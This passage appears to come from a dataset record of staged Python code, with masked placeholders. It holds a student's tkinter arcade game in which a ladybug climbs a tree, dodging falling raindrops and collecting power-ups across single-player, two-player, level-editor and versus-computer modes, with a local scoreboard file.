event.keysym == 'Left' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player2X = 550\n elif event.keysym == 'Right' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player2X = 750\n\n\ndef AIMousePressed(event, data):\n checkHome(event, data)\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-5": "#Arushi Patel (aruship)\r\nfrom tkinter import *\r\nimport random\r\n\r\n######################################\r\n#images taken from wikipedia,pixabay,\r\n#trans americas, clipartpanda,pngimg,\r\n#findicons, microsoft word\r\n######################################\r\n\r\n####################################\r\n# init\r\n####################################\r\ndef init(data):\r\n data.score =0\r\n data.mode = \"splashScreen\"\r\n data.timerDelay = 100\r\n data.height = 800\r\n data.width = 800\r\n data.speed = 10\r\n data.speedAI = 12\r\n data.speedAI2 = 12\r\n data.switchOnProgress = False\r\n data.r = 25\r\n data.cx= 280\r\n data.cy=750\r\n data.onLeft1, data.onLeft2 = True, True\r\n data.win= False\r\n data.coconuts = []\r\n data.powerUps = []\r\n data.coconuts1 = []\r\n data.coconuts2 = []\r\n data.coconutsAI1 =[]\r\n data.coconutsAI2 = []\r\n data.invincible = []\r\n data.pauseDrops = False\r\n data.pause1Drop = False\r\n data.pause2Drop = False\r\n init1(data)\r\n\r\ndef init1(data):\r\n data.beInvincible = False\r\n data.Invincible1 = False\r\n data.Invincible2 = False\r\n data.scaryBug = []\r\n data.time = 0\r\n data.coconutFall = False\r\n data.sides = [\"r\", \"l\"]\r\n data.level = 1\r\n data.splashScreenTime = 0\r\n data.splashScreenDrops = []\r\n data.background= PhotoImage(file=\"tree.gif\")\r\n data.deadScreen = PhotoImage(file = \"deadBug.gif\")\r\n data.ladyBug = PhotoImage(file = \"lady.gif\")\r\n data.winScreen= PhotoImage(file = \"treeTop1.gif\")\r\n data.winBug = PhotoImage(file = \"littleBug.gif\")\r\n data.halfBackground = PhotoImage(file = \"halfTree.gif\")\r\n data.umbrella = PhotoImage(file = \"umbrella2.gif\")\r\n data.spider = PhotoImage(file = \"spider.gif\")\r\n data.hourGlass = PhotoImage(file = \"hourGlass.gif\")\r\n data.splashScreen = PhotoImage(file = \"splash.gif\")\r\n init2(data)\r\n\r\ndef init2(data):\r\n data.tbg= PhotoImage(file = \"tbg2.gif\")\r\n data.click = PhotoImage(file = \"click.gif\")\r\n data.notClick = PhotoImage(file = \"notClick.gif\")\r\n data.player1X = 150\r\n data.player1Y = 750\r\n data.player2X = 550\r\n data.player2Y = 750\r\n data.winner = None\r\n data.speed = 12\r\n data.speed2 = 12\r\n data.editorTime = 0\r\n data.editorDrops = []\r\n data.margin = 100\r\n data.enter = False\r\n data.powerUpsEditor = None\r\n data.yourSpeed = None\r\n data.rainSpeed = None\r\n data.slow= data.notClick\r\n data.medium = data.notClick\r\n data.fast = data.notClick\r\n data.drizzle = data.notClick\r\n data.rain =data.notClick\r\n data.thunderstorm = data.notClick\r\n init3(data)\r\n\r\ndef init3(data):\r\n data.yes = data.notClick\r\n data.no = data.notClick\r\n data.enter = data.notClick\r\n data.levelEditorLives =2\r\n data.rSpeed = None\r\n data.start = None\r\n data.start1 = None\r\n data.start2 = None\r\n data.difficulty = None\r\n data.mode1 = data.notClick\r\n data.mode2 = data.notClick\r\n data.mode3 = data.notClick\r\n data.mode4 = data.notClick\r\n data.mode5 = data.notClick\r\n data.mode6 = data.notClick\r\n data.home = PhotoImage(file = \"home.gif\")\r\n data.helpScreen = PhotoImage(file = \"help1.gif\")\r\n data.title = PhotoImage(file = \"title.gif\")\r\n data.scoreList = []\r\n data.spotList = [270,364,458,552, 646, 740]\r\n data.savedScores = readFile(\"score.txt\")\r\n if data.mode == \"levelCreated\":\r\n setEverything(data)\r\n initsplashScreenNumbers(data)\r\n\r\ndef initsplashScreenNumbers(data):\r\n data.splashButtonY = 425\r\n data.p1ButtonX= 225\r\n data.p2ButtonX = 290\r\n data.edButton = 355\r\n data.diffButton = 425\r\n data.helpButton = 490\r\n data.sboardButton = 555\r\n data.hitPenalty = 75\r\n data.splashText = data.height/2-20\r\n data.lives = 2\r\n data.levelMax = 8\r\n data.lane = 94\r\n data.Player1Min= 270\r\n data.Player1Max = 740\r\n data.homeX =50\r\n data.homeY = 650\r\n initScoreBoardHelp(data)\r\n init1Player(data)\r\n\r\ndef initScoreBoardHelp(data):\r\n data.tbgY=5*data.height/12\r\n data.txtTScore = 150\r\n data.S_P = 220\r\n data.numScores = 5\r\n data.scorePos = data.height/10\r\n data.scoreShift = 270\r\n data.helpY = data.height/2-20\r\n data.name = \"\"\r\n data.printName = \"\"\r\n data.hit = False\r\n initAI(data)\r\n\r\ndef init1Player(data):\r\n data.buffer = 40\r\n\r\ndef initAI(data):\r\n data.AITY = 225\r\n data.easyX = 200\r\n data.easyY = 300\r\n data.medX =400\r\n data.hardX = 600\r\n data.enterY = 450\r\n data.difS = 4\r\n data.difM = 6\r\n data.difH = 8\r\n data.last = 500\r\n data.enterX = 575\r\n data.PUT = 450\r\n data.RST = 350\r\n data.YST = 250\r\n####################################\r\n# mode dispatcher\r\n####################################\r\n\r\ndef mousePressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashScreenMousePressed(event, data)\r\n elif (data.mode == \"1Player\"): playerMousePressed(event, data)\r\n elif (data.mode == \"2Player\"): twoPlayerMousePressed(event, data)\r\n elif (data.mode == \"editor\"): editorMousePressed(event,data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedMousePressed(event,data)\r\n elif (data.mode == \"AI\"): AIMousePressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyMousePressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardMousePressed(event, data)\r\n elif (data.mode == \"help\"): helpMousePressed(event, data)\r\n\r\ndef keyPressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashKeyPressed(event, data)\r\n elif (data.mode == \"1Player\"):playerKeyPressed(event, data)\r\n elif (data.mode == \"2Player\"):twoPlayerKeyPressed(event, data)\r\n elif (data.mode == \"editor\"): editorKeyPressed(event, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedKeyPressed(event,data)\r\n elif (data.mode == \"AI\"): AIKeyPressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyKeyPressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardKeyPressed(event, data)\r\n elif (data.mode == \"help\"): helpKeyPressed(event, data)\r\n \r\ndef timerFired(data):\r\n if (data.mode == \"splashScreen\"): splashScreenTimerFired(data)\r\n elif (data.mode == \"1Player\"):playerTimerFired(data)\r\n elif (data.mode == \"2Player\"):twoPlayerTimerFired(data)\r\n elif (data.mode == \"editor\"): editorTimerFired(data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedTimerFired(data)\r\n elif (data.mode == \"AI\"): AITimerFired(data)\r\n elif (data.mode == \"difficulty\"): difficultyTimerFired(data)\r\n elif (data.mode == \"scoreboard\"): scoreboardTimerFired(data)\r\n elif (data.mode == \"help\"): helpTimerFired(data)\r\n\r\ndef redrawAll(canvas, data):\r\n if (data.mode == \"splashScreen\"): splashScreenRedrawAll(canvas, data)\r\n elif (data.mode == \"1Player\"):playerRedrawAll(canvas, data)\r\n elif (data.mode == \"2Player\"):twoPlayerRedrawAll(canvas, data)\r\n elif (data.mode == \"editor\"): editorRedrawAll(canvas, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedRedrawAll(canvas,data)\r\n elif (data.mode == \"AI\"): AIRedrawAll(canvas, data)\r\n elif (data.mode == \"difficulty\"): difficultyRedrawAll(canvas, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardRedrawAll(canvas, data)\r\n elif (data.mode == \"help\"): helpRedrawAll(canvas, data)\r\n\r\n####################################\r\n# splashScreen mode\r\n####################################\r\ndef splashScreenMousePressed(event, data):\r\n #checks for selection of mode\r\n if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:\r\n if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:\r\n data.mode = \"1Player\"\r\n if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:\r\n data.mode = \"2Player\"\r\n if data.edButton-data.r<=event.y<=data.edButton+data.r:\r\n data.mode = \"editor\"\r\n if data.diffButton-data.r<=event.y<=data.diffButton+data.r:\r\n data.mode = \"difficulty\"\r\n if data.helpButton-data.r<=event.y<=data.helpButton+data.r:\r\n data.mode = \"help\"\r\n if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:\r\n data.mode = \"scoreboard\"\r\n\r\ndef splashKeyPressed(event, data):\r\n pass\r\n\r\n\r\ndef splashScreenTimerFired(data):\r\n data.splashScreenTime += 1\r\n if data.splashScreenTime %2 ==1:\r\n rainDropSplash(data)\r\n for drop in data.splashScreenDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef splashScreenButtons(canvas, data):\r\n canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)\r\n canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)\r\n canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)\r\n canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)\r\n canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)\r\n canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)\r\n \r\ndef rainDropSplash(data):\r\n xPosition = random.randint(0,800)\r\n data.splashScreenDrops.append(Coconuts(xPosition,0))\r\n\r\ndef splashScreenRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.splashText-10, image=data.title)\r\n for drop in data.splashScreenDrops: drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.splashText, text=\"\"\"\r\n 1.) Single Player Level Mode\r\n\r\n\r\n 2.) Two-Player Mode\r\n\r\n \r\n 3.) Level Creator Practice Mode\r\n\r\n \r\n 4.) Play Against the Computer\r\n\r\n \r\n 5.) Help and Instructions\r\n\r\n \r\n 6.) Scoreboard\r\n\r\n \r\n \"\"\", font=\"Arial 14 bold\", fill = \"yellow\")\r\n splashScreenButtons(canvas, data)\r\n\r\n####################################\r\n# taken from class notes\r\n####################################\r\n\r\ndef writeFile(path, contents):\r\n with open(path, \"wt\") as f:\r\n f.write(contents)\r\n\r\ndef readFile(path):\r\n with open(path, \"rt\") as f:\r\n return f.read()\r\n\r\n####################################\r\n# 1Player mode\r\n####################################\r\n\r\n\r\n#Coconuts (from Mario game) represent the water drops\r\nclass Coconuts(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.r = 9\r\n self.fill = \"deep sky blue\"\r\n self.speed = 30\r\n self.outline= \"blue\"\r\n\r\n def draw(self, canvas):\r\n canvas.create_polygon(self.x,self.y- 2*self.r,\r\n self.x-self.r, self.y,\r\n self.x, self.y + self.r,\r\n self.x+self.r, self.y, fill = self.fill,\r\n outline = self.outline, width = 3)\r\n\r\n def onTimerFired(self, data):\r\n # downward falling motion\r\n self.y += self.speed\r\n \r\ndef hit(data):\r\n #checks for hitting rain\r\n for coconut in data.coconuts:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:\r\n if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:\r\n data.cy+=data.hitPenalty\r\n if data.mode == \"levelCreated\":\r\n data.lives-=1\r\n elif data.hit ==False and data.level<data.levelMax:\r\n data.score -=data.level\r\n data.coconuts.remove(coconut)\r\n if data.mode == \"levelCreated\":\r\n data.levelEditorLives-=1\r\n\r\n \r\ndef hit2Player(data):\r\n if data.mode == \"2Player\":\r\n if data.Invincible1 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts1:\r\n if coconut.y>=data.player1Y-data.r \\\r\n and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=data.hitPenalty \r\n data.coconuts1.remove(coconut)\r\n if data.Invincible2 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts2:\r\n if coconut.y>=data.player2Y-data.r and \\\r\n coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=data.hitPenalty \r\n data.coconuts2.remove(coconut)\r\n\r\n\r\nclass PowerUps(Coconuts):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.hourGlass)\r\n \r\ndef hitPause(data):\r\n # checks if hits hour-glass & pauses with flag\r\n for powerUp in data.powerUps:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.pauseDrops = True\r\n data.start = data.cy\r\n data.powerUps.remove(powerUp)\r\n elif data.mode == \"2Player\" or data.mode == \"AI\":\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.pause1Drop = True\r\n data.start1 = data.player1Y\r\n data.powerUps.remove(powerUp)\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.pause2Drop = True\r\n data.start2 = data.player2Y\r\n data.powerUps.remove(powerUp)\r\n \r\n\r\nclass Invincible(PowerUps):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n \r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.umbrella)\r\n\r\ndef hitInvincible(data):\r\n #checks if hits umbrella powerup\r\n for powerUp in data.invincible:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.beInvincible = True\r\n data.start = data.cy\r\n data.invincible.remove(powerUp)\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n #for player1\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.Invincible1=True\r\n data.start1 = data.player1Y\r\n data.invincible.remove(powerUp)\r\n # for player 2\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.Invincible2=True\r\n data.start2 = data.player2Y\r\n data.invincible.remove(powerUp)\r\n \r\nclass ScaryBug(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.speed = 25\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.spider)\r\n\r\n def onTimerFired(self, data):\r\n if data.mode ==\"2Player\" or data.mode == \"AI\":\r\n self.speed = 35\r\n self.y -= self.speed\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\" and\\\r\n data.time %8 ==0:\r\n #makes spider dynamically move\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if self.x -data.lane >=data.Player1Min:self.x-=data.lane\r\n else: self.x+=data.lane\r\n elif side == \"r\":\r\n if self.x+data.lane<= data.Player1Max:self.x +=data.lane\r\n else: self.x -=data.lane\r\n \r\n \r\n \r\ndef hitScaryBug(data):\r\n # checks for automatic death by spider\r\n for bug in data.scaryBug:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:\r\n if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:\r\n data.hit = True\r\n data.lives = 0\r\n data.levelEditorLives = 0\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:\r\n if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:\r\n data.winner= \"player2\"\r\n if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:\r\n if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:\r\n data.winner= \"player1\"\r\n\r\ndef drawPowerups(canvas, data):\r\n for bug in data.scaryBug:\r\n bug.draw(canvas, data)\r\n for powerUp in data.powerUps:\r\n powerUp.draw(canvas, data)\r\n for powerUp in data.invincible:\r\n powerUp.draw(canvas, data)\r\n\r\ndef drawHome(canvas, data):\r\n #home button in every screen\r\n canvas.create_image(data.homeX,data.homeY, image= data.home)\r\n\r\ndef checkHome(event, data):\r\n if data.homeY-data.r<= event.y <= data.homeY +data.r:\r\n if data.homeX-data.r<= event.x<=data.homeX+ data.r:\r\n init(data)\r\n \r\ndef coconutShot(data):\r\n if data.level >0 and data.pauseDrops == False:\r\n if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:\r\n #increases drops as level increases\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(data.Player1Max+data.buffer,\r\n data.width +data.buffer)\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n xPosition4 = random.randint(data.Player1Min-data.buffer,\r\n data.Player1Max+data.buffer)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n if data.time %5 ==0:\r\n xPosition3 = random.randint(0, data.Player1Min-data.buffer)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n if data.time % int(24/data.level) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(data.Player1Min,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(data.Player1Max,0))\r\n powerUpCoconutShot(data)\r\n \r\ndef powerUpCoconutShot(data):\r\n #adds powerUps\r\n #magic #s toallow for powerups to be added at different times\r\n if data.time % 60 == 0 and data.time%120 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%50 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %100==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef playerKeyPressed(event,data):\r\n if data.level<data.levelMax and event.keysym == \"r\": init(data)\r\n if (event.keysym == \"Left\") and data.cx>=data.Player1Min+(data.lane/2):\r\n data.cx -=(data.lane)/2\r\n elif(event.keysym == \"Right\") and data.cx<=data.Player1Max:\r\n data.cx +=(data.lane)/2\r\n if data.level >= data.levelMax:\r\n #enter name for scoreboard\r\n if len(event.keysym) ==1:\r\n if len(data.name) <15:\r\n data.name += event.keysym\r\n if event.keysym==\"BackSpace\":\r\n data.name = data.name[0:-1]\r\n if event.keysym == \"Return\":\r\n data.scoreList += ((data.score, data.name))\r\n #saves file\r\n writeFile(\"score.txt\",\r\n data.savedScores+str(data.score)+\",\"+data.name+\"\\n\")\r\n data.mode =\"scoreboard\"\r\n \r\n\r\ndef playerMousePressed(event, data): checkHome(event, data)\r\n\r\ndef playerTimerFired(data):\r\n #actually pauses, and moves drops/player\r\n if data.hit== False and data.level<data.levelMax:\r\n data.cy-=data.speed\r\n if data.time%5 ==0: data.score +=data.level\r\n if data.cy < 15: #basically made it to the top\r\n data.level +=1\r\n data.cy = data.Player1Max + 10\r\n data.speed +=2\r\n if data.cy>40: #so drops you can't see don't hit you\r\n data.time +=1\r\n if data.pauseDrops !=True: coconutShot(data)\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n # only want drops to move if not paused\r\n if data.pauseDrops == False: coconut.onTimerFired(data)\r\n if data.beInvincible == False:hit(data)\r\n if data.start != None:\r\n if abs(data.start-data.cy) >= 120:\r\n #to limit time for powerups to be active\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\ndef playerRedrawAll(canvas, data):\r\n # magic #s mainly for screen placement\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,50, text =\"Level: %d\" %data.level,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/6,80, text =\"Score: %d\" %data.score,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(2*data.width/3,660,\r\n text =\"\"\"The greater the level, the more points get\r\n added to your score!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.hit== True:\r\n canvas.create_rectangle(0,0,data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,280, text =\"Score: %d\" %data.score,\r\n font = \"Arial 13 bold\", fill = \"yellow\")\r\n if data.level >= 8: madeIt(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef madeIt(canvas, data):# magic #s mainly for screen placement\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,70, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,100, text =\"Score: %d\" %data.score,\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,375, text =\"Congrats! Enter your Name!\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,\r\n fill = \"white\")\r\n canvas.create_text(data.width/2, 425, text = data.name)\r\n \r\n \r\n####################################\r\n# 2Player mode\r\n#################################### \r\ndef drop2Player(data):\r\n #adds drops when not paused\r\n #magic #s are position of where drops are starting\r\n if data.winner ==None and data.pauseDrops == False:\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:\r\n #so random drops don't interfere with the lane ones\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(xPosition1 +410,0))\r\n if data.time % 12 ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0))\r\n if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))\r\n powerupDrop2Player(data)\r\n\r\ndef powerupDrop2Player(data):\r\n #adds powerups on both screens (in the same position)\r\n if data.time % 45 == 0 and data.time%90 !=0:\r\n #randomize placement\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))\r\n if data.time%60 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))\r\n elif side ==\"r\":\r\n if 